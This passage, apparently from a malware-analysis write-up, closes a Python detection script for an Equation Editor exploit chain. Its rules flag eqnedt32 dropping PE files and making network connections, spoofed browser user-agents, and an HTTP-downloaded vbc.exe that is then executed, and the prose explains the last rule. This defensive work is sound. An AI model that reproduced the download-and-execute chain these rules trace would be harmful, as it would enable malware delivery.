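            hits.add("execution_from_users_public")
    for d in drops:
        if basename(d["Process"]) == EQUATION_EDITOR and d["Head"].startswith(b"MZ"):
            hits.add("eqnedt32_drops_pe")
    client = basename(net["Image"])
    if client == EQUATION_EDITOR:
        hits.add("eqnedt32_network_connection")
    _, req = parse_http_head(request)
    if BROWSER_UA.search(req.get("user-agent", "")) and client not in BROWSERS:
        hits.add("browser_ua_from_non_browser")
    status, resp = parse_http_head(response)
    length = int(resp.get("content-length", "0"))
    if status.endswith("200 OK") and (resp.get("content-type") == "application/x-msdownload"
                                      or body_head.startswith(b"MZ")):
        hits.add("pe_downloaded_over_http")
    # Tie the download to what hit disk and what ran: the server's own size claim
    # (ETag), Content-Length, the dropped file and the started process all agree,
    # and the drop and the process share an MD5.
    dropped = {d["MD5"] for d in drops if d["Size"] == length}
    if etag_size(resp.get("etag")) == length and any(
            p["MD5"] in dropped and p["Size"] == length for p in processes):
        hits.add("downloaded_pe_dropped_and_executed")
    return sorted(hits)


if __name__ == "__main__":
    print("\n".join(evaluate()))
```

The last rule is the one worth keeping when the others are noisy: the ETag's size field (0x29888), the Content-Length, the dropped file and the executed vbc.exe all state 170120 bytes, and the drop and the process carry the same MD5, so the download, the write and the execution are provably the same object rather than three unrelated alerts.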

      No disassembly